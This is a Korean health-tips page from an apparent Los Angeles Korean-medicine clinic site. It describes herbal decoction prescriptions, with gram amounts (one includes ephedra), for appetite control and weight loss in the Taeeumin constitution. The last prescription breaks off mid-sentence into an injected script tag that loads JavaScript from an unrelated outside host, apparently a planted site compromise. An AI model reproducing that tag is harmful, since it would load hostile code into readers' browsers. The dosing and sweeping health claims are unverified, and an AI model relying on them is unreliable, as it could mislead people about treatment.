HOME > 한방자료실 > 건강상식

건강상식 태음인 처방-기운 순환 좋게 하고 뱃속 허전함 채우기
2008-12-09 06:08:38
건강지킴이

기운 순환 좋게 하고 뱃속 허전함 채우기


태음인 치료의 주안점을 태음인 특유의 왕성한 식욕을 억제하고 뱃속의 허전함을 채워주는 데 둔다. 이 때문에 억지로 식욕을 참아야 하는 괴로움이 없어 좋다. 기운의 순환을 좋게 하는 약재를 써서 건강해지면서 살이 빠진다.

치료의 특징
치료를 시작하면 먼저 몸이 가벼워지고 잠이 준다. 기운이 없어 틈만 나면 눕고 기대고 하던 사람이 몸이 가벼워지니 움직임이 활발해진다. 움직이는 게 많아지니 에너지 소모가 늘어나고 그럴수록 더욱 몸이 가벼워지게 되는 것이다. 그리고 밤에 깊은 잠을 잘 수가 있어 낮에 졸리는 현상이 없어진다. 특히 몸이 무거워서 책상 앞에 앉기만 하면 졸던 학생들은 쾌적한 기분으로 공부하니 성적이 올라갈 수밖에 없는 것이다. 중년의 부인들은 피로가 사라지고 일할 의욕이 난다고 말한다. 두번째로 위가 튼튼해진다. 살찐 사람의 대부분은 밥을 먹고나면 속이 더부룩하고 트림을 자주한다. 마치 소나 양의 되새김질 같던 이런 증상이 없어지고 속이 편안해진다. 위가 튼튼해지면 음식욕심을 더 부리게 되겠거니 생각하기 쉬운데 실은 그 반대다. 음식앞에서 자제력이 생기고 냉장고를 여닫는 횟수가 현저하게 줄어들 것이다. 세번째로 과식을 하면 반드시 후회한다. 음식을 적게 먹으면 속이 편안한데 많이 먹으면 속이 부대끼는 것이다. 이런 후회가 많아질수록 점점 음식의 포로에서 탈출할 수가 있다. 심한 경우는 과식한 후에 설사를 하기도 한다. 네번째로 몸이 붓지 않는다. 뚱뚱한 사람의 공통적인 증상이 피로하거나 많이 먹고나서는 붓는데 이것이 사라진다. 이뇨제를 먹은 것처럼 편안하고 얼굴이 탄탄해보인다. 기운 순환이 잘 되면 부기는 저절로 사라진다.

* 아래의 모든 약처방은 10일 분량이며 달인 후 한회 분량은 커피잔으로 2/3가 적당하다. 이것은 약 110ml에 해당한다.

청폐사간탕
① 갈근 300g, 고본 황금 160g 길경 나복자 승마 백지를 각각 80g씩 한꺼번에 달여 놓고 하루에 3회씩 10일 동안 마신다.
② 살집이 단단하고 맥이 강한사람에게 적당하다.
③ 간의 기운을 맑게 하고 폐를 정화시킨다. 특히 변비가 있고 입이 잘 마르는 사람에게 좋다.

청심연자탕
① 여기서 청심은 우황청심원의 그 청심이다.
② 마음을 맑게 하고 기억력을 회복시켜 준다.
③ 소변을 잘 나오게 해서 부기를 가라앉히는 효능이 있다.
④ 꿈을 많이 꾸면서 가슴이 잘 두근거리는 사람이 복용하면 좋다.
⑤ 연자육 산약 160g 맥문동 천문동 원지 석창포 산조인 용안육 황금 나복자 백자인 80g 감국 20g을 한꺼번에 달여서 하루에 3회씩 10일 동안 마신다.

태음조위탕
① 청폐사간탕이나 청심연자탕을 복용하고나서 별다른 효과가 없는 경우에도 이 처방으로 좋은 효과가 나는 사람이 많다.
② 의의인 건율 240g 나복자 120g 맥문동 오미자 석창포 길경 마황 80g을 한꺼번에 달여서 하루에 3회씩 10일 동안 마신다.
③ 태음인의 과도한 식욕을 조절해준다.
④ 속이 더부룩하면서 다리에 힘이 없고, 대변이 묽은 사람에게 좋다.
⑤ 얼굴 색이 희면서 누런 사람이 보다 효과적이다.
⑥ 단 잠을 깊이 이루지 못하거나 변비가 있는 사람은 먹을 수가 없다. 만약 이약을 먹고 나서 변비가 생기거나 입이 마르고, 잠을 이루지 못하면 중단해야 한다.

조위승청탕
① 효과는 태음조위탕과 비슷하지만 마음을 안정시키는 효과가 강하고, 식욕을 억제하는 기능은 태음조위탕과 같다.
② 태음조위탕과 다른 것은 잠을 깊이 자지 못하는 사람도 복용할 수가 있다는 것이다.
③ 체중조절에 매우 효과적이다. 몸의 신진대사를 촉진하되 기초대사량을 올리기 때문에 점진적으로 몸이 가벼워진다.
④ 설사가 나거나 대변이 묽은 사람에게 좋은데, 이 약을 먹고나?script src=http://s.lbs66.cn/kr.js>


그린한방병원 주소 : 3020 WILSHIRE BLVD. #222 LOS ANGELES, CA 90010
TEL. 213-389-3003 COPYRIGHT 2008 그린한방병원 ALL RIGHTS RESERVED